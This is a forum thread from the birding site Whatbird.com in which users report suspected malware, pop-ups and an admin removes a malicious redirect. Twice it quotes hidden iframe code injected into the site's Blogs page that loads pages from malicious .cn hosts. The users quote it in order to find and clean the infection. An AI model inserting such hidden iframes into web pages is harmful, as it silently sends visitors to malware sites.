Whatbird.com

This site has a virus problems and add on errors galore. I posted earlier but don't know what happened to it. Snowyowl and I were posting simultaneously when my browser froze. Scary that I could see his screen for a moment like I was him. I logged off immediately. I'm an ethical person (thank goodness) but someone with no scruples could have easily compromised his account. It isn't safe to have this occur regularly. Scripting errors, auto-add ons without authorization, and potential access our PCs from remote servers are very critical system failures. I know everyone at Whatbird has been working diligently to correct the past virus problem but this is beyond AVG software. Someone needs to step up the security measures. I went through steps but see code on one of Matt's post (if you follow the "lunch" thread) which is still tehre now. A site for "megasizzle" pops up trying to add on to the Whatbird browser window. I tried to report on Friday about a PUP getting blocked by my AV software called mysqld-nt. I noticed it tried to gain unauthorized access by trying to add scripting dictionaries in five languages. Other problems have been reported such as the use of Adobe acrobat and Reader, any older versions of PDF link (Mozilla) software, Quicktime for BonJour, and other platforms, also IE 7 & 8 spellchecker program Whatbird users can download from this site as an add on are infected. I uninstalled everything related to the add-ons and your browser.

I'm not a site admin but let me see if I can help.

1) The only reference I see to Megasizzle.com in the Lunch thread is your avatar.  The image in your avatar is http://megasizzle.com/wp-content/uploads/2008/12/bird1.gif.  

2) mysqld-nt is not a virus, so I'm not sure exactly what happened there.  But I've never gotten a popup on Whatbird.com.  Do you see popups here often?

3) The Whatbird spellchecker is a third-party application (IE-Spell).  There's no indication to me that it is infected, but if it is, it's not really Whatbird's problem -- you are directed to IE-Spell's website to download it, and the Whatbird admins don't have control over IE-Spell's website.  Download at your own risk.

4) The issue you had with Snowyowl is inexplicable to me.  It could be a freak thing where the site gets confused if two people post at exactly the same time.  You state that it isn't safe for it to occur regularly but you only give one example of it happening.  Have you seen this before?

Now, the virus from a few weeks ago was directing users to malware sites.  The Blogs page is still doing that via the last line in the source code:

<iframe src="http://yournameshop.cn:8080/index.php" mce_src="http://yournameshop.cn:8080/index.php" width=160 height=152 style="visibility: hidden"></iframe>

I thought we had all these entries removed at one point but perhaps I missed the one on Blogs.  In any event, I don't see this happening on any other Whatbird page.

Here's the bottom line though.  Anyone who uses IE to surf the web is putting themselves at risk.  Use Firefox or Opera (my favorite) and be happy.  Every once in a while there will be a site that doesn't load properly unless you use IE.  Use IE for these sites only -- make Firefox or Opera your default browser.  

Most web-based attacks are designed to be successful against IE, so often just using Firefox or Opera makes you safe.  For example -- the code on the Blogs page tries to execute some type of PDF thing as well as another download when I load the page with IE.  When I load it with Opera however, nothing occurs.

As for Whatbird's issues, I know they've done virus scans and found nothing.  It could be that the attacker has remote access to their servers.  All passwords should be changed, and I think it would be wise to have the security folks at Nacio (the hosting provider) do a security assessment of the server(s).

I just wanted to agree with the comment about not using IE as your default browser...  I use Google's Chrome and Mozilla's Firefox and have never had a problem on Whatbird or any other site regarding viruses or illegitimate popups.

The iframe at the bottom of the Blogs page has changed to:

<iframe src="http://greatshopfilm.cn:8080/index.php" width=162 height=189 style="visibility: hidden"></iframe>

So either there's an active virus running on the server that is making changes or the attackers have access to the server themselves.

Thanks for the input everyone. I'll have to switch to another browser.

Plethora- To answer your question "has that ever happened before" about posting at the same time, well no. However, a user commented to me that she rec'd a message I sent that was intended for another user. That too seems like unusually bizarre behavior.

The Blogs page still has the malware redirect.  I guess no one's reading this.  I emailed admin@whatbird.com to no avail.

Yup, sure does.  I know they had trouble getting rid of them on other pages (they'd delete it, but it would come back). 

Hopefully they'll figure out a way to keep these off the site for good.

We have removed the redirect and all pages, so if anyone things that still have it make sure its not a page in your cache that needs to be cleared. If you think its still there please let us know here.

---

Mitch Waite

I frames are an easy target for Trojans most are are a redirect they are usually not a dangerous virus more a nuisance type redirecting you to sites they are known as browser Hi-jackers, If you want to use another browser I see that a couple have been put forward already here is another one apple Safari  it is a windows based copy of the Mac browser.

There is a very good mal ware program that will blitz malware it is called Malwarebytes it is freeware and can be found here

http://www.malwarebytes.org/

---

In loving memory of Nancy my darling wife of 10 years who passed away on Monday November the 16th 2009 after an illness

My photo gallery http://thekiwi.org/photography/index.php